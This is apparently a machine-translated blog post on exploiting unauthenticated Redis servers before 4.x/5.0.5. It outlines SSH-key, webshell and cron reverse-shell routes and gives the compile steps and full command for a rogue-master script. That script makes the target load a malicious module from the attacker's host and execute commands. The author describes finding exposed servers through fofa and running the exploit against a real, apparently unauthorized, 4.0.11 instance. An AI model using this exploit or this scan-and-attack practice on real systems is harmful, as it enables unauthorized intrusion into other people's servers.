Unauthorized access to rce before Redis 4.x/5.0.5
Regarding the redis unauthorized access vulnerability, there are already a lot of ways to use it on the Internet. The
default port is 6379. The unauthorized password is generally empty, and there may be weak passwords. There are
basically three ways to use unauthorized access~~The
first: SSH password-free login
- Need to open ssh service
- Requires /root/.ssh or other .ssh to be able to write
The second: write directly to the webshell
- Start web service
- Need to know the absolute path of the website
- Have permission to operate on files
The third type: timing task rebound shell
- Need root privileges
- Know the path of the timing plan, such as /var/spool/cron
I searched a wave with fofa, and there are actually many unauthorized redis:
directly use redis-cli -h xxxx to connect and enter, enter info:
real environment, just connect and see,,,,,
back to the topic: Redis 4 The
principle of unauthorized access to rce before .x/5.0.5 : Unauthorized access to Redis In versions prior to 4.x/5.0.5, we can use the master/slave mode to load remote modules and execute arbitrary commands through dynamic link libraries. .
Use script: https://github.com/vulhub/redis-rogue-getshell
Before using it, you need to compile it to generate exp.so:
cd RedisModulesSDK/
make
The script can then be executed:
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"
Here we use fofa to find a version that matches (the version is not necessarily able to execute the command), version 4.0.11:
run the script, you can get the result of the command execution:
real environment, click to the end~~
what is wrong with the description , Welcome everyone to point out~~